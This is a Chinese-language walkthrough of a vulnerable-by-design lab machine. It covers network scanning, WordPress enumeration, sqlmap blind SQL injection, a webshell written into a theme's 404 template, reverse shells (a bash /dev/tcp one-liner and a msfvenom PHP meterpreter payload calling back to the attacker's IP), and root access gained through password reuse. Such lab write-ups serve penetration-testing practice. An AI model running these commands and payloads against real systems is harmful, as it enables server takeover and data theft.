99

0x00 环境搭建

靶机环境:ubuntu
攻击机:kali、windows
虚拟机:VirtualBOX
网络环境:桥接

0x01 信息收集

nmap扫描192.168.1.0/24

探测靶机IP192.168.1.35
开放端口80、443、8080

80端口只有一个图片,查看源代码没有任何信息
443和8080都跳转到wordpress网站

上扫描器和wpscan
wordpress版本4.1
目录扫描出很多文件和目录

网站开放评论,应该是下载的插件

错误信息暴露绝对路径

http://192.168.1.35:8080/wordpress/wp-content/themes/twentythirteen/

使用dirbuster扫描192.168.1.35,发现login.php和phpmyadmin

(PS:由于网络不一样,所以桥接的IP也变了,环境都是一样的)
phpmyadmin没有账号密码无法登录.
login.php,发现登录页面,且随意输入账户密码后页面有回显,可能存在注入

抓包后使用POST盲注测试

sqlmap -r 1.txt --random-agent --level 3 --risk 2

wordpress账户密码

admin:SuperSecretPassword

login账户密码

candyshop:password
Sir:PopRocks

login登录页面无可利用的信息,登录成功后,页面返回1,失败返回0

利用wordpress账户登录后台

0x02 获取webshell

编辑主题,在404模板中写入木马。

webshell地址

http://192.168.43.95:8080/wordpress/wp-content/themes/Kratos-2/404.php


使用蚁剑连接

使用蚁剑来执行sudo su命令失败了。。虽然id是1,权限很高,但是还是想提权试试,使用nc反弹一波

bash -c'sh -i&> / dev / tcp / 192.168.43.1 / 4444 0>&1'

在蚁剑中反弹shell失败,使用msf反弹shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.66 LPORT=4444 -f raw >text.php

将test.php文件复制到404.php中,执行404.php,msf接收反弹成功

获取shell,使用python命令返回一个回显终端

python -c 'import pty;pty.spawn("/bin/bash")'

0x03 提权

虽然daemon权限很高,id为1,但是不提权到root,老是感觉少了点啥,查看了敏感目录和passwd等信息,准备使用脏牛提权一波,但是安装需要root权限,通过msf反弹的shell,使用su,密码为wordpress后台登录密码。成功提权到root权限

daemon:SuperSecretPassword

密码复用。。还好测试了一波,然后这个点就放过了。。

通关成功!!!

0x04 总结

1、靶场总体来说不难,用以往的知识是完全可以做出来的,主要就是看是否细心了。
2、信息收集,不能只看一个点,比如这个靶机开了三个web服务,其中两个指向同一个程序,但是另外一个也需要收集好信息,信息收集还是比较弱的地方。

继续努力加油!!!